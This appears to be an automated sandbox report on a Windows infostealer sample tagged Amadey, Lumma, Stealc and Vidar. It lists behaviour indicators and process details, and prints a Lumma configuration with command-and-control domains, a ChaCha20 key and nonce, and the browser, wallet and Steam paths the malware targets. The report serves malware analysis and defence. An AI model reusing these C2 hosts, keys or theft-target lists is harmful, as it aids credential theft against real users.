File name:

ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe

Full analysis: https://app.any.run/tasks/67c985a5-5f37-4e86-bd52-221d7faefc28
Verdict: Malicious activity
Threats:

Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.

Analysis date: May 24, 2026, 06:03:16
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
powershell
stealer
stealc
vidar
lumma
amadey
botnet
attachments
attc-unc
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 19 sections
MD5:

814D8CA6614937AFB3ECE9E3AB05D76A

SHA1:

824C0089DE1D85E4259DE989F09D9568B3D869CC

SHA256:

AB28151431A6C9E8A59A722AD639C1E3C1ED11B33EA1DDC648CBB0B9B6938960

SSDEEP:

1536:iB6mruejWfpHK8d1RZnerVurqWX9sLizoWpCemj7IjUlrPtttEHKq9uFmFpfD7i3:iImrue6fpNdDomKSHPoj3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes powershell execution policy (Bypass)

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
      • powershell.exe (PID: 5616)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 5616)
      • powershell.exe (PID: 1504)
      • powershell.exe (PID: 5288)
      • powershell.exe (PID: 8968)
      • powershell.exe (PID: 5116)
      • powershell.exe (PID: 8588)
      • powershell.exe (PID: 8892)
      • powershell.exe (PID: 9568)
      • powershell.exe (PID: 9400)
      • powershell.exe (PID: 8964)
      • powershell.exe (PID: 9676)
      • powershell.exe (PID: 8616)
      • powershell.exe (PID: 9540)
      • powershell.exe (PID: 9616)
      • powershell.exe (PID: 8036)
      • powershell.exe (PID: 4600)
      • powershell.exe (PID: 10172)
      • powershell.exe (PID: 10020)
      • powershell.exe (PID: 3684)
      • powershell.exe (PID: 9732)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 5616)
    • Changes settings for real-time protection

      • powershell.exe (PID: 1504)
      • powershell.exe (PID: 5288)
      • powershell.exe (PID: 8968)
      • powershell.exe (PID: 5116)
      • powershell.exe (PID: 8588)
      • powershell.exe (PID: 8892)
      • powershell.exe (PID: 9400)
      • powershell.exe (PID: 9568)
      • powershell.exe (PID: 8964)
      • powershell.exe (PID: 9676)
      • powershell.exe (PID: 8616)
      • powershell.exe (PID: 9540)
      • powershell.exe (PID: 9616)
      • powershell.exe (PID: 4600)
      • powershell.exe (PID: 8036)
      • powershell.exe (PID: 10172)
      • powershell.exe (PID: 10020)
      • powershell.exe (PID: 3684)
    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 1504)
      • powershell.exe (PID: 5288)
      • powershell.exe (PID: 8968)
      • powershell.exe (PID: 8588)
      • powershell.exe (PID: 5116)
      • powershell.exe (PID: 8892)
      • powershell.exe (PID: 9400)
      • powershell.exe (PID: 8964)
      • powershell.exe (PID: 9676)
      • powershell.exe (PID: 8616)
      • powershell.exe (PID: 9540)
      • powershell.exe (PID: 9616)
      • powershell.exe (PID: 9568)
      • powershell.exe (PID: 4600)
      • powershell.exe (PID: 8036)
      • powershell.exe (PID: 10172)
      • powershell.exe (PID: 10020)
      • powershell.exe (PID: 3684)
    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 1504)
      • powershell.exe (PID: 5288)
      • powershell.exe (PID: 8968)
      • powershell.exe (PID: 8588)
      • powershell.exe (PID: 5116)
      • powershell.exe (PID: 8892)
      • powershell.exe (PID: 9400)
      • powershell.exe (PID: 9568)
      • powershell.exe (PID: 8964)
      • powershell.exe (PID: 9676)
      • powershell.exe (PID: 8616)
      • powershell.exe (PID: 9540)
      • powershell.exe (PID: 9616)
      • powershell.exe (PID: 4600)
      • powershell.exe (PID: 8036)
      • powershell.exe (PID: 10172)
      • powershell.exe (PID: 10020)
      • powershell.exe (PID: 3684)
    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 1504)
      • powershell.exe (PID: 5288)
      • powershell.exe (PID: 8968)
      • powershell.exe (PID: 8588)
      • powershell.exe (PID: 5116)
      • powershell.exe (PID: 8892)
      • powershell.exe (PID: 9400)
      • powershell.exe (PID: 9568)
      • powershell.exe (PID: 8964)
      • powershell.exe (PID: 9676)
      • powershell.exe (PID: 8616)
      • powershell.exe (PID: 9540)
      • powershell.exe (PID: 9616)
      • powershell.exe (PID: 4600)
      • powershell.exe (PID: 8036)
      • powershell.exe (PID: 10172)
      • powershell.exe (PID: 10020)
      • powershell.exe (PID: 3684)
    • Changes Controlled Folder Access settings

      • powershell.exe (PID: 1504)
      • powershell.exe (PID: 5288)
      • powershell.exe (PID: 8968)
      • powershell.exe (PID: 8588)
      • powershell.exe (PID: 5116)
      • powershell.exe (PID: 8892)
      • powershell.exe (PID: 9400)
      • powershell.exe (PID: 9568)
      • powershell.exe (PID: 8964)
      • powershell.exe (PID: 9676)
      • powershell.exe (PID: 8616)
      • powershell.exe (PID: 9540)
      • powershell.exe (PID: 9616)
      • powershell.exe (PID: 4600)
      • powershell.exe (PID: 8036)
      • powershell.exe (PID: 10172)
      • powershell.exe (PID: 10020)
      • powershell.exe (PID: 3684)
    • Adds IP address to the Windows Defender exclusion list

      • powershell.exe (PID: 5616)
    • Changes Windows Defender settings

      • powershell.exe (PID: 5616)
    • STEALC has been detected (SURICATA)

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
    • Actions looks like stealing of personal data

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
    • Steals credentials from Web Browsers

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
      • 5ee45668.exe (PID: 9920)
    • VIDAR has been detected (SURICATA)

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
    • Creates scheduled task from XML file

      • cmd.exe (PID: 9828)
      • cmd.exe (PID: 6836)
    • LUMMA has been detected (SURICATA)

      • svchost.exe (PID: 2232)
      • chrome.exe (PID: 5160)
      • chrome.exe (PID: 7288)
      • chrome.exe (PID: 5568)
      • chrome.exe (PID: 552)
    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 9828)
      • cmd.exe (PID: 6836)
    • AMADEY mutex has been found

      • hostmanager.exe (PID: 2000)
      • systemhelper.exe (PID: 8384)
    • LUMMA mutex has been found

      • 5ee45668.exe (PID: 9920)
    • AMADEY has been detected (SURICATA)

      • hostmanager.exe (PID: 2000)
    • LUMMA has been detected (YARA)

      • 5ee45668.exe (PID: 9920)
  • SUSPICIOUS

    • Found IP address in command line

      • powershell.exe (PID: 5616)
      • powershell.exe (PID: 1504)
      • powershell.exe (PID: 5288)
      • powershell.exe (PID: 8968)
      • powershell.exe (PID: 8588)
      • powershell.exe (PID: 5116)
      • powershell.exe (PID: 8892)
      • powershell.exe (PID: 9400)
      • powershell.exe (PID: 9568)
      • powershell.exe (PID: 8964)
      • powershell.exe (PID: 9676)
      • powershell.exe (PID: 8616)
      • powershell.exe (PID: 9540)
      • powershell.exe (PID: 9616)
      • powershell.exe (PID: 4600)
      • powershell.exe (PID: 8036)
      • powershell.exe (PID: 10172)
      • powershell.exe (PID: 10020)
      • powershell.exe (PID: 9732)
      • powershell.exe (PID: 3684)
    • The process bypasses the loading of PowerShell profile settings

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
      • powershell.exe (PID: 5616)
    • Probably download files using WebClient

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
    • Starts POWERSHELL.EXE for commands execution

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
      • powershell.exe (PID: 5616)
    • The process executes Powershell scripts

      • powershell.exe (PID: 5616)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 5616)
      • powershell.exe (PID: 1504)
      • powershell.exe (PID: 5288)
      • powershell.exe (PID: 8968)
      • powershell.exe (PID: 8588)
      • powershell.exe (PID: 5116)
      • powershell.exe (PID: 8892)
      • powershell.exe (PID: 9568)
      • powershell.exe (PID: 9400)
      • powershell.exe (PID: 8964)
      • powershell.exe (PID: 9676)
      • powershell.exe (PID: 8616)
      • powershell.exe (PID: 9540)
      • powershell.exe (PID: 9616)
      • powershell.exe (PID: 4600)
      • powershell.exe (PID: 8036)
      • powershell.exe (PID: 10172)
      • powershell.exe (PID: 10020)
      • powershell.exe (PID: 3684)
      • powershell.exe (PID: 9732)
    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 5616)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 5616)
    • Application launched itself

      • powershell.exe (PID: 5616)
    • Gets path to any of the special folders (POWERSHELL)

      • powershell.exe (PID: 1504)
      • powershell.exe (PID: 5288)
      • powershell.exe (PID: 8968)
      • powershell.exe (PID: 8588)
      • powershell.exe (PID: 5116)
      • powershell.exe (PID: 8892)
      • powershell.exe (PID: 9400)
      • powershell.exe (PID: 9568)
      • powershell.exe (PID: 8964)
      • powershell.exe (PID: 9676)
      • powershell.exe (PID: 8616)
      • powershell.exe (PID: 9540)
      • powershell.exe (PID: 4600)
      • powershell.exe (PID: 9616)
      • powershell.exe (PID: 8036)
      • powershell.exe (PID: 10020)
      • powershell.exe (PID: 10172)
      • powershell.exe (PID: 3684)
      • powershell.exe (PID: 9732)
    • Usage of PowerShell observed

      • powershell.exe (PID: 5616)
    • Searches for installed software

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
    • Possible stealing from crypto wallets

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
      • 5ee45668.exe (PID: 9920)
    • Possible stealing from password managers

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
      • 5ee45668.exe (PID: 9920)
    • Contacting a server suspected of hosting an CnC

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
      • svchost.exe (PID: 2232)
      • chrome.exe (PID: 5160)
      • hostmanager.exe (PID: 2000)
      • chrome.exe (PID: 7288)
      • chrome.exe (PID: 5568)
      • chrome.exe (PID: 552)
    • Possible stealing of email data

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
    • Browser launch with unusual user-data-dir

      • msedge.exe (PID: 8440)
      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
      • msedge.exe (PID: 4656)
      • chrome.exe (PID: 3380)
    • Possible stealing from browsers

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
      • 5ee45668.exe (PID: 9920)
    • The process verifies whether the antivirus software is installed

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
    • Browser headless start

      • chrome.exe (PID: 3380)
      • firefox.exe (PID: 8140)
      • msedge.exe (PID: 8440)
      • msedge.exe (PID: 4656)
      • firefox.exe (PID: 880)
      • chrome.exe (PID: 6428)
      • msedge.exe (PID: 1772)
    • Possible stealing of FTP data

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
    • Possible stealing of cloud data

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2120)
      • cmd.exe (PID: 9828)
      • cmd.exe (PID: 10004)
      • cmd.exe (PID: 9620)
      • cmd.exe (PID: 9824)
      • cmd.exe (PID: 8384)
      • cmd.exe (PID: 6836)
    • The executable file from the user directory is run by the CMD process

      • b4c92495.exe (PID: 9764)
      • 5ee45668.exe (PID: 9920)
    • Executable content was dropped or overwritten

      • b4c92495.exe (PID: 9764)
      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
      • powershell.exe (PID: 9732)
      • HM7K7.exe (PID: 4776)
    • The process deletes folder without confirmation

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
    • Starts CMD.EXE with special quote handling

      • cmd.exe (PID: 10004)
      • cmd.exe (PID: 9620)
      • cmd.exe (PID: 8384)
    • Starts CMD.EXE with output disabled

      • cmd.exe (PID: 10004)
      • cmd.exe (PID: 9620)
      • cmd.exe (PID: 8384)
    • Possible stealing from 2fa

      • 5ee45668.exe (PID: 9920)
    • Possible stealing from notes

      • 5ee45668.exe (PID: 9920)
    • PowerShell delay command usage (probably sleep evasion)

      • powershell.exe (PID: 9732)
    • Starts process via Powershell

      • powershell.exe (PID: 9732)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 9732)
  • INFO

    • Reads the computer name

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
      • identity_helper.exe (PID: 7248)
      • identity_helper.exe (PID: 8584)
      • b4c92495.exe (PID: 9764)
      • 5ee45668.exe (PID: 9920)
      • hostmanager.exe (PID: 2000)
      • uKN9Yic.exe (PID: 4280)
      • HM7K7.exe (PID: 4776)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 5616)
    • Checks supported languages

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
      • identity_helper.exe (PID: 7248)
      • identity_helper.exe (PID: 8584)
      • b4c92495.exe (PID: 9764)
      • 5ee45668.exe (PID: 9920)
      • hostmanager.exe (PID: 2000)
      • HM7K7.exe (PID: 4776)
      • systemhelper.exe (PID: 8384)
      • uKN9Yic.exe (PID: 4280)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 5616)
    • Create files in a temporary directory

      • powershell.exe (PID: 1504)
      • powershell.exe (PID: 5288)
      • powershell.exe (PID: 8968)
      • powershell.exe (PID: 8588)
      • powershell.exe (PID: 5116)
      • powershell.exe (PID: 8892)
      • powershell.exe (PID: 9400)
      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
      • b4c92495.exe (PID: 9764)
      • powershell.exe (PID: 9568)
      • powershell.exe (PID: 8964)
      • powershell.exe (PID: 9676)
      • powershell.exe (PID: 8616)
      • powershell.exe (PID: 9540)
      • powershell.exe (PID: 9616)
      • powershell.exe (PID: 4600)
      • powershell.exe (PID: 8036)
      • powershell.exe (PID: 10172)
      • powershell.exe (PID: 10020)
      • powershell.exe (PID: 3684)
      • powershell.exe (PID: 9732)
      • HM7K7.exe (PID: 4776)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 1504)
      • powershell.exe (PID: 5288)
      • powershell.exe (PID: 8968)
      • powershell.exe (PID: 8588)
      • powershell.exe (PID: 5116)
      • powershell.exe (PID: 8892)
      • powershell.exe (PID: 9400)
      • powershell.exe (PID: 9568)
      • powershell.exe (PID: 8964)
      • powershell.exe (PID: 9676)
      • powershell.exe (PID: 8616)
      • powershell.exe (PID: 9540)
      • powershell.exe (PID: 9616)
      • powershell.exe (PID: 4600)
      • powershell.exe (PID: 8036)
      • powershell.exe (PID: 10172)
      • powershell.exe (PID: 10020)
      • powershell.exe (PID: 3684)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 1504)
      • powershell.exe (PID: 5288)
      • powershell.exe (PID: 8968)
      • powershell.exe (PID: 8588)
      • powershell.exe (PID: 5116)
      • powershell.exe (PID: 8892)
      • powershell.exe (PID: 9400)
      • powershell.exe (PID: 9568)
      • hostmanager.exe (PID: 2000)
      • powershell.exe (PID: 8964)
      • powershell.exe (PID: 9676)
      • powershell.exe (PID: 8616)
      • powershell.exe (PID: 9540)
      • powershell.exe (PID: 9616)
      • powershell.exe (PID: 4600)
      • powershell.exe (PID: 8036)
      • powershell.exe (PID: 10172)
      • powershell.exe (PID: 10020)
      • powershell.exe (PID: 3684)
      • powershell.exe (PID: 9732)
    • Reads the machine GUID from the registry

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
      • uKN9Yic.exe (PID: 4280)
    • Reads product name

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
    • Reads Environment values

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
      • identity_helper.exe (PID: 7248)
      • identity_helper.exe (PID: 8584)
    • Reads CPU info

      • ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe (PID: 4692)
    • Application launched itself

      • chrome.exe (PID: 6236)
      • chrome.exe (PID: 8768)
      • msedge.exe (PID: 2528)
      • msedge.exe (PID: 5876)
      • msedge.exe (PID: 3640)
      • msedge.exe (PID: 3380)
      • msedge.exe (PID: 8440)
      • firefox.exe (PID: 8140)
      • msedge.exe (PID: 4656)
      • chrome.exe (PID: 3380)
      • firefox.exe (PID: 880)
      • chrome.exe (PID: 9328)
      • chrome.exe (PID: 9708)
      • chrome.exe (PID: 8768)
      • chrome.exe (PID: 2260)
    • There is functionality for taking screenshot (YARA)

      • 5ee45668.exe (PID: 9920)
    • UPX packer has been detected

      • 5ee45668.exe (PID: 9920)
    • Manual execution by a user

      • OpenWith.exe (PID: 8968)
      • OpenWith.exe (PID: 9252)
    • Launches file with unassociated extension

      • OpenWith.exe (PID: 8968)
      • OpenWith.exe (PID: 9252)
    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 8968)
      • OpenWith.exe (PID: 9252)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 9732)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Lumma

(PID) Process(9920) 5ee45668.exe
C2 (9)brownhc.cyou
carytui.vu/caccc
decrnoj.club/xxx
genugsq.best/main
longmbx.click/manifest
mushxhb.best/info
pomflgf.vu/help
strikql.shop/owner
ulmudhw.shop/create
ChaCha20
key3sLZJYFiUaoA/La86pQ+xihPm+rmeXW2kGoDoICWUrw=
nonceYIw0qZH8JqI=
counter0
key3sLZJYFiUaoA/La86pQ+xihPm+rmeXW2kGoDoICWUrw=
nonceYIw0qZH8JqI=
counter2
Strings (42)%LocalAppData%\Steam\local.vdf
%ProgramFiles%\
%ProgramW6432%\
/Extensions/
Account
Applications/Steam/Tokens.txt
Content-Disposition: form-data; name="
Content-Disposition: form-data; name="file"; filename="
Content-Type: application/octet-stream
Content-Type: multipart/form-data; boundary=
Cookie: __cf_mw_byp=
DiscordPTB
InstallLocation
KERNEL32.DLL
LocalAppData
Login Data
Login Data For Account
Mails/Windows Mail
Mails/Windows Mail Alternative
Network\Cookies
NtQueryVirtualMemory
ROOT\CIMV2
SELECT * FROM Win32_BIOS
SeImpersonatePrivilege
SerialNumber
SystemDrive
Thunderbird
Web Data
\Application\
\IndexedDB\chrome-extension_
\KnownDlls\
\Local State
\Local Storage\leveldb
\LocalState\Indexed\LiveComm\
\Packages
\Sync Extension Settings\
crypt32.dll
eyAidHlwIjogIkpXVCIsICJhbGciOiAiRWREU0EiIH0
microsoft.windowscommunicationsapps*
name="atok" value="
ntdll.dll
steam.exe
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2026:05:24 02:44:50+00:00
ImageFileCharacteristics: Executable, No line numbers, Large address aware
PEType: PE32+
LinkerVersion: 2.45
CodeSize: 10240
InitializedDataSize: 10240
UninitializedDataSize: 512
EntryPoint: 0x13e0
OSVersion: 4
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
347
Monitored processes
192
Malicious processes
36
Suspicious processes
3

Behavior graph

Click at the process to see the details
start #STEALC ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe powershell.exe conhost.exe no specs slui.exe powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe powershell.exe chrome.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe conhost.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs powershell.exe conhost.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs powershell.exe conhost.exe no specs chrome.exe firefox.exe no specs msedge.exe no specs msedge.exe firefox.exe chrome.exe no specs msedge.exe no specs chrome.exe chrome.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs firefox.exe no specs msedge.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs b4c92495.exe cmd.exe no specs conhost.exe no specs schtasks.exe no specs cmd.exe no specs conhost.exe no specs #LUMMA 5ee45668.exe #LUMMA svchost.exe cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs #AMADEY hostmanager.exe chrome.exe chrome.exe no specs chrome.exe no specs #LUMMA chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe conhost.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs powershell.exe conhost.exe no specs chrome.exe no specs #LUMMA chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe conhost.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs #LUMMA chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs chrome.exe no specs powershell.exe conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs #LUMMA chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs openwith.exe no specs powershell.exe conhost.exe no specs openwith.exe no specs msedge.exe no specs powershell.exe conhost.exe no specs msedge.exe no specs powershell.exe ukn9yic.exe hm7k7.exe cmd.exe no specs conhost.exe no specs schtasks.exe no specs msedge.exe no specs systemhelper.exe no specs msedge.exe no specs msedge.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
552"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --string-annotations --field-trial-handle=2192,i,10864623077996350732,5696893485246414784,262144 --variations-seed-version --mojo-platform-channel-handle=2292 /prefetch:3C:\Program Files\Google\Chrome\Application\chrome.exe
chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
672"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,15478921029684755974,10014116254425998276,262144 --variations-seed-version=20251218-201203.402000 --mojo-platform-channel-handle=3104 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
800\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
880"C:\Program Files\Mozilla Firefox\firefox.exe" --no-first-run --disable-extensions --headless --disable-logging --log-level=3 --user-data-dir=C:\Users\admin\AppData\Local\noeUpate\4838d848 about:blankC:\Program Files\Mozilla Firefox\firefox.exe
firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Exit code:
0
Version:
136.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msvcp140.dll
996"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --pdf-upsell-enabled --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4188,i,3132691517879545001,11753269668591855763,262144 --variations-seed-version --mojo-platform-channel-handle=4200 /prefetch:2C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1284\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
